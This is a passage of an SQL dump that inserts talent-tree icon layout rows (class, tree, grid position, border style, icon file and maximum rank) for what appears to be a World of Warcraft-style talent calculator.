3, 5, 2, 'talent_icon', 'icon_border_grey_down', 'ability_thunderbolt.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 3, 5, 3, 'talent_icon', 'icon_border_grey', 'ability_warrior_shieldbash.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 3, 6, 2, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 3, 6, 3, 'talent_icon', 'icon_border_grey', 'inv_sword_20.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 3, 7, 2, 'talent_icon', 'icon_border_grey_inc', 'inv_shield_05.png', 1, 5, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 1, 1, 2, 'talent_icon', 'icon_border_green', 'ability_golemthunderclap.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 1, 1, 3, 'talent_icon', 'icon_border_green', 'spell_nature_sleep.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 1, 2, 2, 'talent_icon', 'icon_border_grey', 'spell_arcane_blink.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 1, 2, 3, 'talent_icon', 'icon_border_grey', 'ability_thunderbolt.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 1, 3, 1, 'talent_icon', 'icon_border_grey', 'spell_holy_holybolt.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 1, 3, 2, 'talent_icon', 'icon_border_grey', 'spell_holy_innerfire.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 1, 3, 3, 'talent_icon', 'icon_border_grey', 'spell_holy_layonhands.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 1, 3, 4, 'talent_icon', 'icon_border_grey', 'spell_holy_unyieldingfaith.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 1, 4, 2, 'talent_icon', 'icon_border_grey_down', 'spell_holy_greaterheal.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 1, 4, 3, 'talent_icon', 'icon_border_grey', 'spell_holy_sealofwisdom.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 1, 5, 2, 'talent_icon', 'icon_border_grey_inc_top_down', 'spell_holy_heal.png', 1, 4, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 1, 5, 3, 'talent_icon', 'icon_border_grey', 'spell_holy_healingaura.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 1, 6, 2, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 1, 6, 3, 'talent_icon', 'icon_border_grey', 'spell_holy_power.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 1, 7, 2, 'talent_icon', 'icon_border_grey_inc', 'spell_holy_searinglight.png', 1, 5, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 2, 1, 2, 'talent_icon', 'icon_border_green', 'spell_holy_devotionaura.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 2, 1, 3, 'talent_icon', 'icon_border_green_down', 'ability_defend.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 2, 2, 1, 'talent_icon', 'icon_border_grey', 'ability_rogue_ambush.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 2, 2, 2, 'talent_icon', 'icon_border_grey', 'spell_holy_sealofprotection.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 2, 2, 3, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 2, 2, 4, 'talent_icon', 'icon_border_grey', 'spell_holy_devotion.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 2, 3, 1, 'talent_icon', 'icon_border_grey', 'spell_magic_magearmor.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 2, 3, 2, 'talent_icon', 'icon_border_grey', 'spell_holy_sealoffury.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 2, 3, 3, 'talent_icon', 'icon_border_grey_inc', 'inv_shield_06.png', 3, 1, 3); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 2, 3, 4, 'talent_icon', 'icon_border_grey', 'spell_magic_lesserinvisibilty.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 2, 4, 2, 'talent_icon', 'icon_border_grey', 'spell_holy_sealofmight.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 2, 4, 3, 'talent_icon', 'icon_border_grey', 'spell_holy_mindsooth.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 2, 5, 2, 'talent_icon', 'icon_border_grey_down', 'spell_nature_lightningshield.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 2, 5, 3, 'talent_icon', 'icon_border_grey', 'spell_holy_blessingofstrength.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 2, 6, 2, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 2, 6, 3, 'talent_icon', 'icon_border_grey', 'inv_sword_20.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 2, 7, 2, 'talent_icon', 'icon_border_grey_inc', 'spell_holy_blessingofprotection.png', 1, 5, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 3, 1, 2, 'talent_icon', 'icon_border_green', 'spell_holy_fistofjustice.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 3, 1, 3, 'talent_icon', 'icon_border_green', 'spell_frost_windwalkon.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 3, 2, 1, 'talent_icon', 'icon_border_grey', 'spell_holy_righteousfury.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 3, 2, 2, 'talent_icon', 'icon_border_grey', 'spell_holy_holysmite.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 3, 2, 3, 'talent_icon', 'icon_border_grey', 'ability_parry.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 3, 3, 1, 'talent_icon', 'icon_border_grey', 'spell_holy_vindication.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 3, 3, 2, 'talent_icon', 'icon_border_grey_down', 'spell_holy_retributionaura.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 3, 3, 3, 'talent_icon', 'icon_border_grey', 'ability_warrior_innerrage.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 3, 3, 4, 'talent_icon', 'icon_border_grey', 'spell_holy_persuitofjustice.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 3, 4, 1, 'talent_icon', 'icon_border_grey', 'spell_holy_eyeforaneye.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 3, 4, 2, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 3, 4, 3, 'talent_icon', 'icon_border_grey', 'spell_holy_auraoflight.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 3, 5, 1, 'talent_icon', 'icon_border_grey', 'inv_hammer_04.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 3, 5, 2, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 3, 5, 3, 'talent_icon', 'icon_border_grey', 'spell_holy_mindvision.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 3, 6, 2, 'talent_icon', 'icon_border_grey_inc', 'ability_racial_avatar.png', 5, 4, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (2, 3, 7, 2, 'talent_icon', 'icon_border_grey', 'spell_holy_prayerofhealing.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 1, 1, 2, 'talent_icon', 'icon_border_green', 'spell_nature_ravenform.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 1, 1, 3, 'talent_icon', 'icon_border_green', 'spell_nature_reincarnation.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 1, 2, 1, 'talent_icon', 'icon_border_grey', 'ability_eyeoftheowl.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 1, 2, 2, 'talent_icon', 'icon_border_grey', 'ability_hunter_aspectofthemonkey.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 1, 2, 3, 'talent_icon', 'icon_border_grey', 'inv_misc_pelt_bear_03.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 1, 2, 4, 'talent_icon', 'icon_border_grey', 'ability_hunter_beastsoothe.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 1, 3, 1, 'talent_icon', 'icon_border_grey', 'ability_mount_jungletiger.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 1, 3, 2, 'talent_icon', 'icon_border_grey', 'ability_druid_dash.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 1, 3, 3, 'talent_icon', 'icon_border_grey', 'ability_bullrush.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 1, 4, 2, 'talent_icon', 'icon_border_grey', 'ability_hunter_mendpet.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 1, 4, 3, 'talent_icon', 'icon_border_grey_down', 'inv_misc_monsterclaw_04.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 1, 5, 1, 'talent_icon', 'icon_border_grey', 'ability_druid_demoralizingroar.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 1, 5, 2, 'talent_icon', 'icon_border_grey_down', 'ability_devour.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 1, 5, 3, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 1, 5, 4, 'talent_icon', 'icon_border_grey', 'spell_nature_abolishmagic.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 1, 6, 2, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 1, 6, 3, 'talent_icon', 'icon_border_grey_inc', 'inv_misc_monsterclaw_03.png', 5, 4, 3); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 1, 7, 2, 'talent_icon', 'icon_border_grey_inc', 'ability_druid_ferociousbite.png', 1, 5, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 2, 1, 2, 'talent_icon', 'icon_border_green', 'spell_frost_stun.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 2, 1, 3, 'talent_icon', 'icon_border_green', 'spell_frost_wizardmark.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 2, 2, 2, 'talent_icon', 'icon_border_grey', 'ability_hunter_snipershot.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 2, 2, 3, 'talent_icon', 'icon_border_grey_down', 'ability_searingarrow.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 2, 3, 1, 'talent_icon', 'icon_border_grey', 'inv_spear_07.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 2, 3, 2, 'talent_icon', 'icon_border_grey', 'ability_impalingbolt.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 2, 3, 3, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 2, 3, 4, 'talent_icon', 'icon_border_grey', 'ability_townwatch.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 2, 4, 2, 'talent_icon', 'icon_border_grey', 'ability_hunter_quickshot.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 2, 4, 3, 'talent_icon', 'icon_border_grey_inc', 'ability_piercedamage.png', 5, 2, 3); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 2, 5, 1, 'talent_icon', 'icon_border_grey', 'ability_golemstormbolt.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 2, 5, 2, 'talent_icon', 'icon_border_grey_down', 'ability_upgrademoonglaive.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 2, 5, 3, 'talent_icon', 'icon_border_grey', 'ability_hunter_criticalshot.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 2, 6, 2, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 2, 6, 3, 'talent_icon', 'icon_border_grey', 'inv_weapon_rifle_06.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 2, 7, 2, 'talent_icon', 'icon_border_grey_inc', 'ability_trueshot.png', 1, 5, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 3, 1, 1, 'talent_icon', 'icon_border_green', 'inv_misc_head_dragon_black.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 3, 1, 2, 'talent_icon', 'icon_border_green', 'spell_holy_prayerofhealing.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 3, 1, 3, 'talent_icon', 'icon_border_green', 'ability_parry.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 3, 2, 1, 'talent_icon', 'icon_border_grey', 'spell_nature_stranglevines.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 3, 2, 2, 'talent_icon', 'icon_border_grey', 'ability_racial_bloodrage.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 3, 2, 3, 'talent_icon', 'icon_border_grey', 'ability_rogue_trip.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 3, 3, 1, 'talent_icon', 'icon_border_grey', 'spell_nature_timestop.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 3, 3, 2, 'talent_icon', 'icon_border_grey', 'spell_shadow_twilight.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 3, 3, 3, 'talent_icon', 'icon_border_grey_down', 'ability_whirlwind.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 3, 4, 1, 'talent_icon', 'icon_border_grey', 'ability_ensnare.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 3, 4, 2, 'talent_icon', 'icon_border_grey', 'ability_kick.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 3, 4, 3, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 3, 4, 4, 'talent_icon', 'icon_border_grey', 'ability_rogue_feigndeath.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 3, 5, 2, 'talent_icon', 'icon_border_grey_down', 'spell_holy_blessingofstamina.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 3, 5, 3, 'talent_icon', 'icon_border_grey_inc', 'ability_warrior_challange.png', 1, 3, 3); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 3, 6, 2, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 3, 6, 3, 'talent_icon', 'icon_border_grey', 'spell_nature_invisibilty.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (3, 3, 7, 2, 'talent_icon', 'icon_border_grey_inc', 'inv_spear_02.png', 1, 5, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 1, 1, 1, 'talent_icon', 'icon_border_green', 'ability_rogue_eviscerate.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 1, 1, 2, 'talent_icon ', 'icon_border_green', 'ability_fiegndead.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 1, 1, 3, 'talent_icon', 'icon_border_green_down', 'ability_racial_bloodrage.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 1, 2, 1, 'talent_icon', 'icon_border_grey', 'ability_druid_disembowel.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 1, 2, 2, 'talent_icon', 'icon_border_grey', 'spell_shadow_deathscream.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 1, 2, 3, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 1, 2, 4, 'talent_icon', 'icon_border_grey', 'ability_rogue_slicedice.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 1, 3, 1, 'talent_icon', 'icon_border_grey', 'ability_warrior_decisivestrike.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 1, 3, 2, 'talent_icon', 'icon_border_grey', 'ability_warrior_riposte.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 1, 3, 3, 'talent_icon', 'icon_border_grey_inc', 'ability_criticalstrike.png', 5, 1, 3); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 1, 4, 2, 'talent_icon', 'icon_border_grey', 'ability_rogue_feigndeath.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 1, 4, 3, 'talent_icon', 'icon_border_grey', 'ability_poisons.png', 3, 0, 0); INSERT 